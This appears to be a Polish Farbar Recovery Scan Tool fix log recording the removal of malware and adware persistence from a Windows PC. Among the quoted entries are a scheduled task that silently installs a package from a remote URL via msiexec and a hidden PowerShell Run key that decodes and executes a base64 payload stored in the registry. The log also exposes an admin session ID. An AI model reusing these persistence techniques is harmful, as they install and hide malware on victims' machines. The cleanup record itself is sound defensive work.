Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 14-05-2017 Uruchomiony przez And (15-05-2017 10:03:10) Run:1 Uruchomiony z C:\wirusy Załadowane profile: And & MSSQL$SQLEXPRESS (Dostępne profile: And & MSSQL$SQLEXPRESS) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: Task: {5C315247-7CF8-4294-B160-6CD790E6648C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () <==== UWAGA Task: {6DE9C13A-8EE5-46B0-B795-AD460E7657A9} - System32\Tasks\RunAtStartup => C:\Users\And\AppData\Roaming\Event Monitor\em.exe <==== UWAGA Task: {83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} - System32\Tasks\Reozosh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_67194_F412129D&d=20170509 /q <==== UWAGA Task: {6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} - System32\Tasks\Lerfopervather Host => C:\Program Files (x86)\Drabocultthhery\nahit.exe [2017-05-09] (Google Inc.) RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Program Files (x86)\Drabocultthhery MSCONFIG\startupreg: BestZiper => "C:\Program Files (x86)\BestZiper\BestZiper.exe" MSCONFIG\startupreg: N0FGC0HF1V04D31 => "C:\Program Files (x86)\BestZiper\5L5DB.exe" MSCONFIG\startupreg: ukoivek2U'.exe => C:\Program Files\DeviceClient\B58EKQXZ\ukoivek2U'.exe -r1_5 -r2_1 RemoveDirectory: C:\Program Files (x86)\BestZiper HKLM-x32\...\Run: [] => [X] HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv))); HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <===== UWAGA HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\RunOnce: [uninstall.exe] => C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B\uninstall.exe [759808 2017-05-10] () <===== UWAGA C:\Users\And\AppData\Local\background_fault C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B HKLM\...\Providers\qm1gaf6p: C:\Program Files (x86)\Lerfopervather Host\local64spl.dll [312832 2017-05-09] () ShellExecuteHooks: Brak nazwy - {6DE8549C-316B-11E7-A1E9-64006A5CFC23} - C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll [147968 2017-05-09] () RemoveDirectory: C:\Program Files (x86)\Lerfopervather Host RemoveDirectory: C:\Users\And\AppData\Roaming\Ckanovofesp CHR HomePage: Default -> hxxp://www.istartsurf.com/?type=hp&ts=1447668479&z=f316c3522e14f508af318b4g6z2zdmeqcq2bbg7b4e&from=cor&uid=SAMSUNGXHM321HI_S265J90Z835696835696 CHR StartupUrls: Default -> "hxxps://www.google.com/analytics/web/?hl=pl&pli=1#report/defaultid/a36587162w64719130p66464611/","hxxps://adwords.google.com/cm/CampaignMgmt?authuser=0&__u=1748779171&__c=8682546511#r.ONLINE.cm&app=cm","hxxps://merchants.google.com/Home?a=10826943#insights","hxxps://mysalesbee.com/#app/dashboard","hxxp://druktak.pl/administracja/login_admin.php?osCAdminID=pn0s2alrf79plgtqaqmprnmu91" R2 BIT; C:\ProgramData\BIT\BIT.dll [1858048 2017-05-09] (BIT.dll) [Brak podpisu cyfrowego] R2 VNASRE; C:\Users\And\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] S2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== UWAGA S2 Recover; C:\Program Files\HJ32FO8OE1\CDXYBXJQWQGUU5\fDorppRER_.exe [X] C:\ProgramData\BIT C:\Users\And\AppData\Local\VNASRE C:\Users\And\AppData\Roaming\WinSAPSvc S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X] S3 netr7364; system32\DRIVERS\netr7364.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark 1200 Series\Lexmark Solution Center.LNK C:\Users\And\Links\151119.lnk C:\Users\And\Links\160602.lnk C:\Users\And\Desktop\fakt NOWY KW.lnk ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Eggper RemoveDirectory: C:\Program Files (x86)\Firefox EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5C315247-7CF8-4294-B160-6CD790E6648C} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5C315247-7CF8-4294-B160-6CD790E6648C} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Milimili => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6DE9C13A-8EE5-46B0-B795-AD460E7657A9} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DE9C13A-8EE5-46B0-B795-AD460E7657A9} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\RunAtStartup => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunAtStartup => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Reozosh => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Reozosh => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Lerfopervather Host => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lerfopervather Host => klucz pomyślnie usunięto "C:\Program Files (x86)\MIO" => pomyślnie usunięto. "C:\Program Files (x86)\Drabocultthhery" => pomyślnie usunięto. HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BestZiper => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\N0FGC0HF1V04D31 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ukoivek2U'.exe => klucz pomyślnie usunięto "C:\Program Files (x86)\BestZiper" => nie znaleziono. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\EnableShellExecuteHooks => Wartość pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{30190F18-418E-46D2-9ECB-B950915738AB} => Wartość pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\\uninstall.exe => Wartość pomyślnie usunięto C:\Users\And\AppData\Local\background_fault => pomyślnie przeniesiono C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B => pomyślnie przeniesiono HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\qm1gaf6p => klucz pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order qm1gaf6p => pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{6DE8549C-316B-11E7-A1E9-64006A5CFC23} => Wartość pomyślnie usunięto HKCR\CLSID\{6DE8549C-316B-11E7-A1E9-64006A5CFC23} => klucz nie znaleziono. "C:\Program Files (x86)\Lerfopervather Host" => pomyślnie usunięto. niepowodzenie przy usuwaniu "C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll" => Zaplanowany do usunięcia przy restarcie. niepowodzenie przy usuwaniu "C:\Users\And\AppData\Roaming\Ckanovofesp" => Zaplanowany do usunięcia przy restarcie. Chrome HomePage => pomyślnie usunięto Chrome StartupUrls => pomyślnie usunięto BIT => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\BIT => klucz pomyślnie usunięto BIT => serwis pomyślnie usunięto VNASRE => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\VNASRE => klucz pomyślnie usunięto VNASRE => serwis pomyślnie usunięto WinSAPSvc => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\WinSAPSvc => klucz pomyślnie usunięto WinSAPSvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\Recover => klucz pomyślnie usunięto Recover => serwis pomyślnie usunięto C:\ProgramData\BIT => pomyślnie przeniesiono C:\Users\And\AppData\Local\VNASRE => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\WinSAPSvc => pomyślnie przeniesiono HKLM\System\CurrentControlSet\Services\DgiVecp => klucz pomyślnie usunięto DgiVecp => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\netr7364 => klucz pomyślnie usunięto netr7364 => serwis pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark 1200 Series\Lexmark Solution Center.LNK => pomyślnie przeniesiono C:\Users\And\Links\151119.lnk => pomyślnie przeniesiono C:\Users\And\Links\160602.lnk => pomyślnie przeniesiono C:\Users\And\Desktop\fakt NOWY KW.lnk => pomyślnie przeniesiono C:\Users\And\Desktop\BigFarm.lnk => Skrót - argument pomyślnie usunięto. C:\Users\And\Desktop\big_bang_empire.lnk => Skrót - argument pomyślnie usunięto. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono "C:\Program Files (x86)\Eggper" => pomyślnie usunięto. "C:\Program Files (x86)\Firefox" => pomyślnie usunięto. =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12150904 B Java, Flash, Steam htmlcache => 16210 B Windows/system/drivers => 54110712 B Edge => 0 B Chrome => 169557379 B Firefox => 378753232 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 66228 B Public => 0 B ProgramData => 0 B systemprofile => 10911052 B systemprofile32 => 10569036 B LocalService => 107188 B NetworkService => 329038 B And => 8417096039 B MSSQL$SQLEXPRESS => 0 B RecycleBin => 5050128457 B EmptyTemp: => 13.1 GB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 15-05-2017 10:18:25) C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll => pomyślnie usunięto C:\Users\And\AppData\Roaming\Ckanovofesp => pomyślnie usunięto ==== Koniec Fixlog 10:18:25 ====